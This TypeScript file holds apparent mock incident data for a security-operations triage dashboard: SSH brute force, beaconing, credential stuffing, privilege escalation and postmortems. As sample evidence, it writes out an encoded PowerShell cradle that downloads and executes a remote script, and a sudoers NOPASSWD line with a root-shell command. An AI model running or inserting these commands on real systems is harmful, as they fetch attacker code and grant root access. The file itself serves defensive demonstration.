import { Incident, SystemHealth, RecalledExperience, LearningEvent } from '../types';

export const mockHealth: SystemHealth = {
  status: 'healthy',
  version: '0.2.0',
  database: 'connected (mock)',
  hindsight: {
    status: 'connected',
    mode: 'mock',
    bank_id: 'sentinel-incident-memory',
    banks_active: 1,
    total_memories_indexed: 5,
  },
};

export const mockRetainedExperiences: RecalledExperience[] = [
  {
    source_incident_id: 'INC-001',
    title: 'High Volume SSH Authentication Failure on Auth-Proxy-02',
    incident_pattern: 'SSH brute-force against internet-facing perimeter node',
    similarity_score: 0.92,
    relevance_label: 'Relevant past experience (92% Match)',
    what_happened: 'External botnet launched high-speed dictionary attack on auth-proxy-02 after routine package updates reverted SSH configuration.',
    past_root_cause: 'Routine OS package upgrade on perimeter node overwrote /etc/ssh/sshd_config with defaults, inadvertently enabling password authentication.',
    past_actions_taken: [
      'Applied edge firewall DROP rule for attacker IP 198.51.100.45',
      'Audited /etc/ssh/sshd_config and enforced PasswordAuthentication no',
      'Restarted sshd service and validated active listening ports',
      'Reviewed /var/log/auth.log for successful session tokens (none found)',
    ],
    past_outcome: 'Contained successfully within 12 minutes. Zero unauthorized sessions established. No lateral movement.',
    lesson_learned: 'Restricting SSH exposure to approved VPN CIDRs and enforcing automated compliance checks prevented repeated attempts from reaching the host.',
    timestamp: '2026-09-22T10:14:00Z',
  },
  {
    source_incident_id: 'INC-004',
    title: 'Obfuscated PowerShell Execution on Finance Endpoint',
    incident_pattern: 'Suspicious PowerShell execution with encoded download cradle',
    similarity_score: 0.85,
    relevance_label: 'Relevant past experience (85% Match)',
    what_happened: 'Malicious Office macro spawned hidden powershell.exe process executing base64 encoded download cradle from remote IP.',
    past_root_cause: 'Phishing attachment executed by accounting clerk bypassing macro notification.',
    past_actions_taken: [
      'Host isolated from enterprise subnet via EDR network containment',
      'Terminated child powershell.exe and parent word.exe process trees',
      'Extracted C2 staging IP and blacklisted at border gateway',
      'Enforced AppLocker PowerShell ConstrainedLanguage mode via GPO',
    ],
    past_outcome: 'Threat contained before second-stage payload execution. Host reimaged clean.',
    lesson_learned: 'Enforcing PowerShell Constrained Language Mode and disabling macros prevents download cradles from completing.',
    timestamp: '2026-09-24T16:30:00Z',
  },
];

export const mockIncidents: Incident[] = [
  // Primary Demo Scenario
  {
    id: 'INC-009',
    title: 'SSH Brute-Force Authentication Surge on Bastion Gateway',
    description: '437 failed external authentication attempts against exposed SSH service within 8 minutes targeting privileged system accounts.',
    incident_type: 'SSH Brute Force',
    severity: 'HIGH',
    status: 'RECOMMENDATION_READY',
    source: '198.51.100.44',
    target: 'prod-bastion-01 (10.0.1.15)',
    analyst_assigned: 'analyst_lead',
    detected_at: '2026-09-28T22:41:10Z',
    created_at: '2026-09-28T22:41:10Z',
    updated_at: '2026-09-28T22:45:00Z',
    indicators: ['198.51.100.44', 'port 22', 'root', 'admin', 'ubuntu', 'deploy'],
    evidence: {
      log_source: '/var/log/auth.log on prod-bastion-01',
      source_ip: '198.51.100.44',
      destination_host: 'prod-bastion-01 (10.0.1.15)',
      attempted_usernames: ['root', 'admin', 'ubuntu', 'deploy'],
      failed_attempts: 437,
      time_window: '8 minutes (22:33:00Z - 22:41:00Z)',
      authentication_method: 'PasswordAuthentication (Attempted)',
      geo_origin: 'External Hosting Provider (AS14061, Sofia, BG)',
      raw_payload: {
        event_count: 437,
        protocol: 'SSH-2.0-OpenSSH_8.9p1',
        sample_log: 'Sep 28 22:40:12 prod-bastion-01 sshd[28419]: Failed password for invalid user deploy from 198.51.100.44 port 49182 ssh2',
        concurrent_streams: 6,
      },
    },
    analysis: {
      classification: 'Credential Attack / SSH Brute Force',
      assessed_severity: 'HIGH',
      confidence: 0.94,
      suspected_root_cause: 'Repeated external authentication attempts against an internet-exposed SSH service with password authentication inadvertently allowed.',
      investigation_summary: 'High-frequency dictionary attack launched from untrusted external IP against bastion perimeter. The attacker is systematically attempting common administrative usernames.',
      evidence_summary: [
        '437 failed authentication attempts detected within 8 minutes',
        'Multiple privileged usernames targeted: root, admin, ubuntu, deploy',
        'Single continuous source IP: 198.51.100.44',
        'Activity concentrated over 6 concurrent TCP streams',
        'Service responded with password authentication prompts indicating possible config drift',
      ],
      tactics: [
        'MITRE ATT&CK T1110.001 - Password Guessing',
        'MITRE ATT&CK T1021.004 - Remote Services: SSH',
        'MITRE ATT&CK T1595.002 - Active Scanning: Vulnerability Scanning',
      ],
      extracted_iocs: ['198.51.100.44', 'port 22', 'root', 'admin', 'deploy'],
      analyzed_at: '2026-09-28T22:42:15Z',
    },
    recommendation: {
      recommended_response: 'Block attacker source IP at edge perimeter, audit SSH daemon configuration to ensure PasswordAuthentication no is strictly enforced, and restrict port 22 to corporate VPN CIDR.',
      why_this_response: 'Similar incidents were previously resolved using IP blocking and SSH exposure reduction. In prior incident INC-001, perimeter firewall drop combined with disabling password authentication completely neutralized the attack with zero session breach.',
      memory_influence: 'Memory-informed recommendation based on recalled experience INC-001 (92% similarity).',
      expected_objective: 'Immediately terminate external brute-force traffic, prevent credential compromise, and enforce permanent hardening against SSH exposure.',
      potential_risks: 'Low risk. Blocking 198.51.100.44 does not impact internal operations. Verifying SSH config carries minimal reload overhead.',
      recommended_actions: [
        '1. Block the identified source IP 198.51.100.44 at perimeter firewall.',
        '2. Restrict SSH exposure on prod-bastion-01 to approved corporate VPN CIDR (10.8.0.0/16).',
        '3. Audit /etc/ssh/sshd_config to ensure PasswordAuthentication no is enforced.',
        '4. Review authentication logs to confirm zero successful sessions were established.',
        '5. Rotate credentials if any targeted account utilized temporary password.',
      ],
      detailed_actions: [
        {
          id: 'ACT-01',
          action: 'Apply perimeter firewall DROP rule for 198.51.100.44',
          reason: 'Immediately cuts off brute-force connection attempts at network edge',
          status: 'RECOMMENDED',
          risk_level: 'LOW',
          requires_approval: true,
          category: 'containment',
        },
        {
          id: 'ACT-02',
          action: 'Restrict SSH exposure on prod-bastion-01 to corporate VPN CIDR',
          reason: 'Prevents untrusted external IP addresses from reaching port 22 directly',
          status: 'RECOMMENDED',
          risk_level: 'MEDIUM',
          requires_approval: true,
          category: 'containment',
        },
        {
          id: 'ACT-03',
          action: 'Audit /etc/ssh/sshd_config and enforce PasswordAuthentication no',
          reason: 'Addresses root cause discovered in prior incident INC-001 (config drift post-update)',
          status: 'RECOMMENDED',
          risk_level: 'LOW',
          requires_approval: false,
          category: 'eradication',
        },
        {
          id: 'ACT-04',
          action: 'Review /var/log/auth.log for successful session tokens',
          reason: 'Confirm no credentials were successfully compromised before containment',
          status: 'RECOMMENDED',
          risk_level: 'LOW',
          requires_approval: false,
          category: 'audit',
        },
      ],
      confidence: 0.94,
      recalled_experiences: [mockRetainedExperiences[0]],
      generated_at: '2026-09-28T22:43:00Z',
    },
  },

  // Incident 2: Suspicious PowerShell execution
  {
    id: 'INC-012',
    title: 'Obfuscated PowerShell Download Cradle Detected',
    description: 'Base64-encoded PowerShell process spawned by WINWORD.EXE attempting external binary download from untrusted host.',
    incident_type: 'Suspicious PowerShell Execution',
    severity: 'CRITICAL',
    status: 'INVESTIGATING',
    source: '10.0.4.88 (win-workstation-08)',
    target: 'win-workstation-08',
    analyst_assigned: 'analyst_marcus',
    detected_at: '2026-09-28T20:15:30Z',
    created_at: '2026-09-28T20:15:30Z',
    updated_at: '2026-09-28T20:20:00Z',
    indicators: ['WINWORD.EXE', 'powershell.exe', '-enc', 'DownloadString', '45.33.32.156'],
    evidence: {
      log_source: 'Sysmon EventID 1 (Process Create) & EventID 3 (Network Connect)',
      source_ip: '10.0.4.88',
      destination_host: '45.33.32.156:8080',
      attempted_usernames: ['j_doe_finance'],
      failed_attempts: 0,
      time_window: '20:14:10Z - 20:15:00Z',
      authentication_method: 'Local Interactive Session',
      geo_origin: 'Internal Finance Subnet / External C2 IP',
      raw_payload: {
        command_line: 'powershell.exe -NoP -NonI -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANAA1AC4AMwAzAC4AMwAyAC4AMQA1ADYAOgA4ADAAOAAwAC8AcwB0AGEAZwBlADIALgBwAHMAMQAnACkA',
        parent_process: 'C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE',
      },
    },
    analysis: {
      classification: 'Execution / Obfuscated PowerShell Download Cradle',
      assessed_severity: 'CRITICAL',
      confidence: 0.96,
      suspected_root_cause: 'Malicious Office macro payload executed by local user attempting to fetch secondary stage C2 beacon.',
      investigation_summary: 'High-severity execution event where Word launched an encoded PowerShell command to download stage2.ps1.',
      evidence_summary: [
        'Sysmon recorded process execution of powershell.exe with -enc argument',
        'Decoded payload reveals WebClient.DownloadString targeting 45.33.32.156:8080',
        'Parent process is WINWORD.EXE under user account j_doe_finance',
      ],
      tactics: [
        'MITRE ATT&CK T1059.001 - PowerShell',
        'MITRE ATT&CK T1027 - Obfuscated Files or Information',
        'MITRE ATT&CK T1105 - Ingress Tool Transfer',
      ],
      extracted_iocs: ['45.33.32.156', 'stage2.ps1', 'WINWORD.EXE'],
      analyzed_at: '2026-09-28T20:17:00Z',
    },
    recommendation: {
      recommended_response: 'Isolate endpoint immediately, terminate process tree, blacklist C2 IP at perimeter, and enforce PowerShell Constrained Language mode.',
      why_this_response: 'Prior incident INC-004 demonstrated that immediate endpoint network isolation prevented stage2 malware execution.',
      memory_influence: 'Memory-informed recommendation based on recalled experience INC-004 (85% similarity).',
      expected_objective: 'Sever outbound connection, prevent execution of secondary backdoor, preserve forensic artifact.',
      potential_risks: 'Temporary disruption to user workflow on win-workstation-08. Required for containment.',
      recommended_actions: [
        '1. Isolate win-workstation-08 from network via EDR agent.',
        '2. Terminate all active powershell.exe and WINWORD.EXE process trees.',
        '3. Block outbound communication to 45.33.32.156 on firewall.',
        '4. Extract dropped file artifacts from %TEMP% for sandboxing.',
      ],
      detailed_actions: [
        {
          id: 'ACT-10',
          action: 'Execute EDR network isolation on win-workstation-08',
          reason: 'Cuts off C2 download stream immediately',
          status: 'RECOMMENDED',
          risk_level: 'MEDIUM',
          requires_approval: true,
          category: 'containment',
        },
        {
          id: 'ACT-11',
          action: 'Block outbound traffic to 45.33.32.156 on edge gateway',
          reason: 'Prevents secondary hosts from accessing C2 distribution server',
          status: 'RECOMMENDED',
          risk_level: 'LOW',
          requires_approval: true,
          category: 'containment',
        },
      ],
      confidence: 0.96,
      recalled_experiences: [mockRetainedExperiences[1]],
      generated_at: '2026-09-28T20:18:00Z',
    },
  },

  // Incident 3: Unusual outbound network traffic
  {
    id: 'INC-015',
    title: 'Unusual Outbound TLS Beaconing to External IP',
    description: 'Continuous 45-second outbound heartbeat connections on port 8443 from internal database replica to suspicious foreign IP.',
    incident_type: 'Unusual Outbound Network Traffic',
    severity: 'HIGH',
    status: 'INVESTIGATING',
    source: '10.0.2.19 (db-replica-02)',
    target: '185.220.101.5:8443',
    analyst_assigned: 'analyst_sarah',
    detected_at: '2026-09-28T18:30:12Z',
    created_at: '2026-09-28T18:30:12Z',
    updated_at: '2026-09-28T18:40:00Z',
    indicators: ['185.220.101.5', 'port 8443', 'db-replica-02', 'JA3-hash: 72a589da586844d7f0818ce684948eea'],
    evidence: {
      log_source: 'Zeek / Corelight Network Flow & SSL logs',
      source_ip: '10.0.2.19',
      destination_host: '185.220.101.5:8443',
      attempted_usernames: [],
      failed_attempts: 0,
      time_window: 'Continuous (Past 4 hours, interval 45.2s +/- 0.4s)',
      authentication_method: 'mTLS handshake with unknown certificate authority',
      geo_origin: 'Netherlands / Bulletproof Hosting Provider',
      raw_payload: {
        total_connections: 320,
        bytes_transferred: '48.2 KB (low jitter heartbeat)',
        ssl_subject: 'CN=api-internal-metrics-sync.net',
      },
    },
    analysis: {
      classification: 'Command and Control / Periodic Beaconing',
      assessed_severity: 'HIGH',
      confidence: 0.91,
      suspected_root_cause: 'Compromised daemon or unauthorized scheduled persistence task establishing C2 channel.',
      investigation_summary: 'Statistical periodicity analysis confirms automated beaconing behavior matching known C2 implant frameworks.',
      evidence_summary: [
        'Over 320 outbound connection attempts with exactly 45s intervals',
        'Destination IP is associated with known bulletproof hosting infrastructure',
        'SSL certificate subject mimics legitimate internal monitoring domains',
      ],
      tactics: [
        'MITRE ATT&CK T1071.001 - Application Layer Protocol: Web Protocols',
        'MITRE ATT&CK T1573.002 - Encrypted Channel: Asymmetric Cryptography',
      ],
      extracted_iocs: ['185.220.101.5', 'api-internal-metrics-sync.net', 'port 8443'],
      analyzed_at: '2026-09-28T18:35:00Z',
    },
  },

  // Incident 4: Repeated failed authentication / Credential Stuffing
  {
    id: 'INC-018',
    title: 'Distributed Credential Stuffing on Single Sign-On Gateway',
    description: 'Over 1,200 authentication attempts across 52 employee accounts originating from 180 rotating residential proxy IP addresses.',
    incident_type: 'Repeated Failed Authentication',
    severity: 'MEDIUM',
    status: 'OPEN',
    source: 'Distributed Residential Proxy Network',
    target: 'identity-sso-gateway.corp.internal',
    analyst_assigned: 'unassigned',
    detected_at: '2026-09-28T15:10:00Z',
    created_at: '2026-09-28T15:10:00Z',
    updated_at: '2026-09-28T15:15:00Z',
    indicators: ['sso-gateway', '180 IP addresses', 'User-Agent: python-requests/2.28'],
    evidence: {
      log_source: 'Okta / Keycloak Auth Gateway Access Logs',
      source_ip: 'Various (Rotating 180 distinct IPs)',
      destination_host: 'identity-sso-gateway.corp.internal',
      attempted_usernames: ['52 corporate email addresses'],
      failed_attempts: 1240,
      time_window: '35 minutes',
      authentication_method: 'HTTP POST /api/v1/auth/login',
      geo_origin: 'Multi-region residential ISP subnets',
      raw_payload: {
        attack_style: 'Low-and-slow spray to bypass single-IP lockout thresholds',
        user_agent: 'python-requests/2.28.1',
      },
    },
  },

  // Incident 5: Suspicious privilege escalation
  {
    id: 'INC-021',
    title: 'Unauthorized Sudoers Modification and Root Shell Spawn',
    description: 'Local service account www-data modified /etc/sudoers.d/99-web and spawned interactive bash shell with UID 0.',
    incident_type: 'Suspicious Privilege Escalation',
    severity: 'CRITICAL',
    status: 'ACTION_REQUIRED',
    source: 'Local Service Account (www-data)',
    target: 'app-cluster-worker-02',
    analyst_assigned: 'analyst_lead',
    detected_at: '2026-09-28T12:05:40Z',
    created_at: '2026-09-28T12:05:40Z',
    updated_at: '2026-09-28T12:12:00Z',
    indicators: ['/etc/sudoers.d/99-web', 'www-data', 'uid=0(root)', '/bin/bash'],
    evidence: {
      log_source: 'Auditd (audit.log) & Linux Sudo Logs',
      source_ip: '10.0.3.45',
      destination_host: 'app-cluster-worker-02',
      attempted_usernames: ['www-data -> root'],
      failed_attempts: 0,
      time_window: '12:04:15Z - 12:05:40Z',
      authentication_method: 'Local Sudo Execution without password',
      geo_origin: 'Internal Kubernetes Cluster Node',
      raw_payload: {
        auditd_syscall: 'execve',
        auditd_exe: '/bin/bash',
        auditd_cmd: 'sudo /bin/bash -i',
        dropped_file: '/etc/sudoers.d/99-web (content: www-data ALL=(ALL) NOPASSWD: ALL)',
      },
    },
    analysis: {
      classification: 'Privilege Escalation / Sudoers Manipulation',
      assessed_severity: 'CRITICAL',
      confidence: 0.98,
      suspected_root_cause: 'Web application remote code execution (RCE) flaw exploited to write sudoers drop-in file and elevate to root.',
      investigation_summary: 'Service account www-data compromised via web app vulnerability, followed immediately by privilege escalation to root.',
      evidence_summary: [
        'Auditd logged creation of /etc/sudoers.d/99-web with NOPASSWD wildcard',
        'Interactive root shell spawned from web server worker process tree',
      ],
      tactics: [
        'MITRE ATT&CK T1548.003 - Abuse Elevation Control: Sudo and Sudo Caching',
        'MITRE ATT&CK T1068 - Exploitation for Privilege Escalation',
      ],
      extracted_iocs: ['/etc/sudoers.d/99-web', 'www-data', 'uid=0'],
      analyzed_at: '2026-09-28T12:08:00Z',
    },
  },

  // Retained Incident INC-001 (Historical Experience Capsule)
  {
    id: 'INC-001',
    title: 'High Volume SSH Authentication Failure on Auth-Proxy-02',
    description: 'Over 14,000 failed SSH login attempts detected from untrusted external IP targeting privileged root account.',
    incident_type: 'SSH Brute Force',
    severity: 'HIGH',
    status: 'POSTMORTEM_COMPLETE',
    source: '198.51.100.45',
    target: 'auth-proxy-02 (10.0.1.10)',
    analyst_assigned: 'analyst_sarah',
    detected_at: '2026-09-22T09:45:10Z',
    created_at: '2026-09-22T09:45:10Z',
    updated_at: '2026-09-22T10:30:00Z',
    indicators: ['198.51.100.45', 'root', 'port 22', 'sshd'],
    evidence: {
      log_source: '/var/log/auth.log',
      source_ip: '198.51.100.45',
      destination_host: 'auth-proxy-02',
      attempted_usernames: ['root', 'admin'],
      failed_attempts: 14200,
      time_window: '15 minutes',
      authentication_method: 'PasswordAuthentication (Enabled)',
      geo_origin: 'External IP 198.51.100.45',
      raw_payload: { failed_attempts: 14200, rule: 'T1110.001' },
    },
    analysis: {
      classification: 'Credential Attack / SSH Brute Force',
      assessed_severity: 'HIGH',
      confidence: 0.95,
      suspected_root_cause: 'Routine OS package upgrade on auth-proxy-02 overwrote /etc/ssh/sshd_config with defaults, inadvertently enabling password authentication.',
      investigation_summary: 'Perimeter proxy was hit by 14,200 dictionary login attempts after package upgrade enabled password authentication.',
      evidence_summary: [
        '14,200 failed attempts within 15 minutes',
        'Targeted root and admin accounts',
        'Password authentication prompt active',
      ],
      tactics: ['MITRE ATT&CK T1110.001 - Password Guessing', 'MITRE ATT&CK T1021.004 - SSH'],
      extracted_iocs: ['198.51.100.45', 'root'],
      analyzed_at: '2026-09-22T09:50:00Z',
    },
    resolution: {
      status: 'RESOLVED',
      resolved_at: '2026-09-22T10:14:00Z',
      resolved_by: 'analyst_sarah',
      actions_taken: [
        'Applied edge firewall DROP rule for IP 198.51.100.45',
        'Audited /etc/ssh/sshd_config and enforced PasswordAuthentication no',
        'Restarted sshd service',
      ],
      outcome: 'Contained successfully within 12 minutes. Zero unauthorized sessions established. Threat completely neutralized.',
      notes: 'Investigated in coordination with infrastructure ops team.',
    },
    postmortem: {
      what_happened: 'Attacker botnet launched high-speed brute force against exposed port 22 on auth-proxy-02.',
      root_cause: 'Routine OS package upgrade on auth-proxy-02 overwrote /etc/ssh/sshd_config with defaults, inadvertently enabling password authentication.',
      what_was_done: 'Immediately applied edge firewall drop rule, restored hardened sshd configuration, and verified auth logs.',
      what_worked: 'Fast perimeter IP blocking stopped further attempts; prompt audit revealed config drift before credentials could be cracked.',
      what_did_not_work: 'Host-based fail2ban was not installed, allowing high volume of attempts to reach the daemon before manual analyst action.',
      final_outcome: 'Threat mitigated without breach. Zero unauthorized accounts compromised.',
      lessons_learned: 'Enforce automated Ansible compliance check on all perimeter servers every 15 minutes to guarantee PasswordAuthentication no is permanently set. Deploy fail2ban as an immediate perimeter circuit breaker.',
      completed_at: '2026-09-22T10:30:00Z',
    },
  },
];

export const mockLearningEvents: LearningEvent[] = [
  {
    id: 'LRN-001',
    incident_id: 'INC-001',
    title: 'SSH Brute-Force Remediation & Config Compliance Retained',
    attack_type: 'SSH Brute Force',
    trigger_event: 'Post-Mortem Completed & Retained',
    retained_memory_id: 'mem_ssh_auth_bastion_01',
    timestamp: '2026-09-22T10:30:00Z',
    root_cause: 'Routine OS package upgrade on auth-proxy-02 overwrote /etc/ssh/sshd_config with defaults, enabling password authentication.',
    outcome_summary: 'Contained in 12 min. Zero breach. Lessons retained in memory bank sentinel-incident-memory.',
    lessons_learned: 'Enforce automated Ansible compliance check on all perimeter servers every 15 minutes to guarantee PasswordAuthentication no is permanently set.',
    matched_subsequent_incidents: ['INC-009'],
  },
  {
    id: 'LRN-002',
    incident_id: 'INC-004',
    title: 'PowerShell Download Cradle Containment Protocol Retained',
    attack_type: 'Suspicious PowerShell Execution',
    trigger_event: 'Post-Mortem Completed & Retained',
    retained_memory_id: 'mem_ps_cradle_finance_01',
    timestamp: '2026-09-24T16:45:00Z',
    root_cause: 'Phishing attachment executed by accounting clerk bypassing macro notification.',
    outcome_summary: 'Endpoint isolated in 6 min. C2 traffic blocked. Stage2 malware thwarted.',
    lessons_learned: 'Enforcing PowerShell Constrained Language Mode and disabling macros prevents download cradles from completing.',
    matched_subsequent_incidents: ['INC-012'],
  },
  {
    id: 'LRN-003',
    incident_id: 'INC-009',
    title: 'Hindsight Memory Accelerated Triage on Bastion Gateway',
    attack_type: 'SSH Brute Force',
    trigger_event: 'Memory Recall Matched to INC-001 (92% Similarity)',
    retained_memory_id: 'mem_ssh_auth_bastion_01',
    timestamp: '2026-09-28T22:43:00Z',
    root_cause: 'Identical attack pattern to INC-001. System immediately identified potential sshd_config drift.',
    outcome_summary: 'Analyst received memory-informed recommendation immediately, reducing triage time from 45 min to under 3 min.',
    lessons_learned: 'Remembered experience from INC-001 prevented SOC team from having to re-diagnose configuration drift from scratch.',
  },
];
